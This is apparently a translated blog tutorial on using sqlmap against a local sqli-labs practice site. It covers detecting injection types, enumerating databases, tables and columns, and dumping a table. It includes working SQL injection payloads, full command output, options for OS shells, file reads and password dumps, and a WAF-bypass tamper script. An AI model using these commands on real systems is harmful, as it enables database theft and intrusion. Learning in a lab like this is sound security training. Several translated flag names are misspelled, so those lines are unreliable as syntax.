"Web Security Attack and Defense" uses sqli-labs to get acquainted with the artifact of SQLmap, and I am also familiar with the use of this tool.
The basic steps of SQL injection:
- Determine the injection type
- Get database name
- Get data table name
- Get field name
- retrieve data
1 Determine the type of injection
1.1 Get type
Use the -u parameter to specify the url (sqlmap level 1)
sqlmap -u "http://localhost:4000/Less-1?id=1"
It should be noted that the URL should preferably be accompanied by the requested parameters.
sqlmap identified the following injection point(s) with a total of 50 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind(布尔盲注)
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 9623=9623 AND 'JjhO'='JjhO
Type: error-based(报错注入)
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: id=1' AND GTID_SUBSET(CONCAT(0x71767a7871,(SELECT (ELT(3702=3702,1))),0x716a6b6271),3702) AND 'oyIr'='oyIr
Type: time-based blind(延时注入)
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 8003 FROM (SELECT(SLEEP(5)))etaK) AND 'ACHt'='ACHt
Type: UNION query(联合注入)
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-9510' UNION ALL SELECT NULL,CONCAT(0x71767a7871,0x65497456414974586b4c4a676479645971685666684c6163637353757955774841706b47726a6755,0x716a6b6271),NULL-- -
---
The parameter id mentioned above can use 4 injection techniques (Boolean, error, delay, union), and the payload used is also given. SQLmap uses 5 SQL injection techniques:
- Joint injection
- Error injection
- Boolean blinds
- Delay injection
- Stack injection
If you are not familiar with these injection types, you can go to sqli-labs to do it. You can refer to my previous article: https://blog.csdn.net/qq_43085611/article/details/112661431.
1.2 POST or GET type
Use Burp Suite to capture packets (the web page that needs to be captured is a locally built URL, which is usually accessed through localhost or 127.0.0.1, but if you pass these two addresses, Burp Suite cannot capture the packet. You can consider modifying the host method. To use other domain names to access), and finally save the captured package locally as a 1.txt file.
Then use the -r parameter to specify the HTTP package (-r REQUESTFILE Load HTTP request from a file)
sqlmap -r 1.txt
This method can detect GET type or POST type injection vulnerabilities.
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 2269=2269 AND 'fYWA'='fYWA
Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: id=1' AND GTID_SUBSET(CONCAT(0x716b6a7671,(SELECT (ELT(8383=8383,1))),0x7176786a71),8383) AND 'THdq'='THdq
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 1253 FROM (SELECT(SLEEP(5)))PKdp) AND 'yWGz'='yWGz
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-8764' UNION ALL SELECT NULL,NULL,CONCAT(0x716b6a7671,0x766e654f656c6f7779676842616d704f53567a74486b645956614a4b527578794d6f44544775644b,0x7176786a71)-- -
If you look carefully at the prompt information given by SQLmap, you can see that he has saved the running results
[16:00:42] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.4.6
back-end DBMS: MySQL >= 5.6
[16:00:42] [INFO] fetched data logged to text files under '/Users/littlechieh6/.local/share/sqlmap/output/burpsuite.slug01sh.top'(运行结果保存地址)
[*] ending @ 16:00:42 /2021-01-26/
2 Get the database name
Use the command
sqlmap -r 1.txt --dbs
Database information
web application technology: PHP 7.4.6
back-end DBMS: MySQL >= 5.6
[16:05:51] [INFO] fetching database names
[16:05:51] [WARNING] reflective value(s) found and filtering out
[16:05:51] [INFO] retrieved: 'mysql'
[16:05:51] [INFO] retrieved: 'information_schema'
[16:05:51] [INFO] retrieved: 'performance_schema'
[16:05:51] [INFO] retrieved: 'sys'
[16:05:51] [INFO] retrieved: 'study'
[16:05:51] [INFO] retrieved: 'hello_ssm'
[16:05:51] [INFO] retrieved: 'dvwa'
[16:05:51] [INFO] retrieved: 'security'
[16:05:51] [INFO] retrieved: 'challenges'
available databases [9]:
[*] challenges
[*] dvwa
[*] hello_ssm
[*] information_schema
[*] mysql
[*] performance_schema
[*] security
[*] study
[*] sys
3 Get the data table name
Use the command
sqlmap -r 1.txt --tables
This command will list all the table names in the system and is not used frequently.
Commonly used commands to get the name of the data table
sqlmap -r 1.txt -D="security" --tables
Use -D to specify the database name to get the data table name of a specific database. The execution results are as follows:
[16:09:23] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.4.6
back-end DBMS: MySQL >= 5.6
[16:09:23] [INFO] fetching tables for database: 'security'
[16:09:23] [WARNING] reflective value(s) found and filtering out
[16:09:23] [INFO] retrieved: 'emails'
[16:09:23] [INFO] retrieved: 'referers'
[16:09:23] [INFO] retrieved: 'uagents'
[16:09:23] [INFO] retrieved: 'users'
Database: security
[4 tables]
+----------+
| emails |
| referers |
| uagents |
| users |
+----------+
[16:09:23] [INFO] fetched data logged to text files under '/Users/littlechieh6/.local/share/sqlmap/output/burpsuite.slug01sh.top'
[*] ending @ 16:09:23 /2021-01-26/
4 Get the field name
Similar to the method of obtaining the table name above, we'd better specify a data table name
sqlmap -r 1.txt -D="security" -T emails --columns
In addition to using the specified parameters -D="security"
embodiment, it may also be employed -T email
in the embodiment.
The execution results are as follows:
[16:13:59] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.4.6
back-end DBMS: MySQL >= 5.6
[16:13:59] [INFO] fetching columns for table 'emails' in database 'security'
[16:14:00] [WARNING] reflective value(s) found and filtering out
[16:14:00] [INFO] retrieved: 'id','int'
[16:14:00] [INFO] retrieved: 'email_id','varchar(30)'
Database: security
Table: emails
[2 columns]
+----------+-------------+
| Column | Type |
+----------+-------------+
| email_id | varchar(30) |
| id | int |
+----------+-------------+
[16:14:00] [INFO] fetched data logged to text files under '/Users/littlechieh6/.local/share/sqlmap/output/burpsuite.slug01sh.top'
[*] ending @ 16:14:00 /2021-01-26/
5 Get data
The command used is:
sqlmap -r 1.txt -D "security" -T emails -C email_id,id --dump
The execution results are as follows:
[16:17:19] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.4.6
back-end DBMS: MySQL >= 5.6
[16:17:19] [INFO] fetching entries of column(s) 'email_id, id' for table 'emails' in database 'security'
[16:17:19] [WARNING] reflective value(s) found and filtering out
[16:17:19] [INFO] retrieved: '[email protected]','1'
[16:17:19] [INFO] retrieved: '[email protected]','2'
[16:17:19] [INFO] retrieved: '[email protected]','3'
[16:17:19] [INFO] retrieved: '[email protected]','4'
[16:17:19] [INFO] retrieved: '[email protected]','5'
[16:17:19] [INFO] retrieved: '[email protected]','6'
[16:17:19] [INFO] retrieved: '[email protected]','7'
[16:17:19] [INFO] retrieved: '[email protected]','8'
Database: security
Table: emails
[8 entries]
+------------------------+----+
| email_id | id |
+------------------------+----+
| [email protected] | 1 |
| [email protected] | 2 |
| [email protected] | 3 |
| [email protected] | 4 |
| [email protected] | 5 |
| [email protected] | 6 |
| [email protected] | 7 |
| [email protected] | 8 |
+------------------------+----+
[16:17:19] [INFO] table 'security.emails' dumped to CSV file '/Users/littlechieh6/.local/share/sqlmap/output/burpsuite.slug01sh.top/dump/security/emails.csv'(数据表)
[16:17:19] [INFO] fetched data logged to text files under '/Users/littlechieh6/.local/share/sqlmap/output/burpsuite.slug01sh.top'
[*] ending @ 16:17:19 /2021-01-26/
The acquired data will be saved in a csv file.
6 Other parameters
Configuration
- --Level n: where n is 1 to 5, representing different detection levels (the higher the level, the more comprehensive the test will be, but more requests will be sent. The default is 1)
- -Referer: Set referer to deceive.
- --Sql-shel: run custom SQL statements
- –Os-cmd or –os-shell: execute system commands
- --File-read: read system files
- –File-write or –file-dest: file write
- --Tamper module name: specify a script to bypass WAF/IDS/IPS
collect message
- -Users: all users
- -Passwords: the user's password
- -Curent-db: current database name
- -Curent-user: current user name
- –Is-dba: Whether the current user is an administrator
- -Roles: list administrators
7 Tamper
The tamper is usually used to bypass WAF. Use a simple base64encode to analyze it.
#!/usr/bin/env python
"""
Copyright (c) 2006-2021 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
from lib.core.convert import encodeBase64
from lib.core.enums import PRIORITY
__priority__ = PRIORITY.LOW
def dependencies():
pass
def tamper(payload, **kwargs):
"""
Base64-encodes all characters in a given payload
>>> tamper("1' AND SLEEP(5)#")
'MScgQU5EIFNMRUVQKDUpIw=='
"""
return encodeBase64(payload, binary=False) if payload else payload
The tamper is mainly to perform a conversion before sending. For example, some websites will perform Base64 encryption before sending, and the server will perform Base64 decryption after receiving the data. If tamper is not used, and sqlmap is used directly, the plaintext will be sent, and it will definitely not be able to inject after the server base64 is decrypted.
Usually it is necessary to specifically analyze the way the website sends data to write a tamper script. Usage:--tamper 模块名(文件名)
.